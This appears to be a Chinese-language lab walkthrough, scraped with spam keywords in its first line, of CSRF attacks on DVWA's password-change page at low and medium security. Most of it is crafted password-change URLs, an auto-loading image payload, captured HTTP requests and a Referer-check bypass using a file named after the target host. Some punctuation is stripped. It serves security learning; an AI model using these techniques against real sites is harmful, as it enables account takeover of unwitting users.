盐山做网站,wordpress可视化编辑器插件,小游戏 打开,做网站百度关键排名CSRF
0x01 low
跨站#xff0c;输入密码和确认密码直接写在url中#xff0c;将连接分享给目标#xff0c;点击后修改密码 社工方式让目标点击短链接
伪造404页#xff0c;在图片中写路径为payload#xff0c;目标载入网页自动请求构造链接#xff0c;目标被攻击
http…CSRF
0x01 low
跨站输入密码和确认密码直接写在url中将连接分享给目标点击后修改密码 社工方式让目标点击短链接
伪造404页在图片中写路径为payload目标载入网页自动请求构造链接目标被攻击
http://dvt.dv/learndvwa/vulnerabilities/csrf/?password_new123password_conf123ChangeChange# 观察到url中的修改信息 目标的网站应当处于登录状态才可攻击成功
恶意网页如下尝试攻击 目标访问抓包观察
GET /att/tforc.html HTTP/1.1
Host: dvt.dv
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7
Cookie: securitymedium; PHPSESSID3ejpptkt8se4a8r4o5vftooj32
Connection: close
第一个包访问页面
GET /learndvwa/vulnerabilities/csrf/?password_newbbbpassword_confbbbChangeChange HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8
Referer: http://dvt.dv/att/tforc.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7
Cookie: securitymedium; PHPSESSID3ejpptkt8se4a8r4o5vftooj32
Connection: close
第二个包请求img标签中的src值
目标的密码被修改利用成功
0x02 medium
stripos( $_SERVER[ HTTP_REFERER ] ,$_SERVER[ SERVER_NAME ]) ! false 增加过滤检测请求头中的reffer请求头中的host由$_SERVER[‘SERVER_NAME’]获取。referer中出现host检测为来源自本host才能使用修改密码功能
在referer中出现host的值能通过。虑构造.html文件的文件名为利用网站的host这样能绕过检测。或将.html放在服务器中包含目标host值的目录中
Low级别的图片演示不妥我直接在网站下建个文件夹放恶意.html文件真实情况下这种条件不可能发生
演示命名文件名
GET /noSpecialFilderName/dvt.dv.html HTTP/1.1
Host: attack.at
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7
If-None-Match: 11a-615565ab38c9e
If-Modified-Since: Fri, 05 Apr 2024 09:48:13 GMT
Connection: closeGET /learndvwa/vulnerabilities/csrf/?password_newfilepassword_conffileChangeChange HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8
Referer: http://attack.at/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7
Connection: close
呵呵谷歌给referer作截断
手动修改
GET /learndvwa/vulnerabilities/csrf/?password_newfilepassword_conffileChangeChange HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8
Referer: http://attack.at/noSpecialFilderName/dvt.dv.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7
Connection: close
GET /learndvwa/login.php HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8
Referer: http://attack.at/noSpecialFilderName/dvt.dv.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7
Connection: close
后面的包也改一下 不太成不知道为啥XD现代浏览器都不这么干了捏
尝试恶意host
GET /learndvwa/vulnerabilities/csrf/?password_newattpassword_confattChangeChange HTTP/1.1
Host: dvt.dv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8
Referer: http://hstnmdvt.dv/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7
Connection: close 这个包能改成 这个也能成
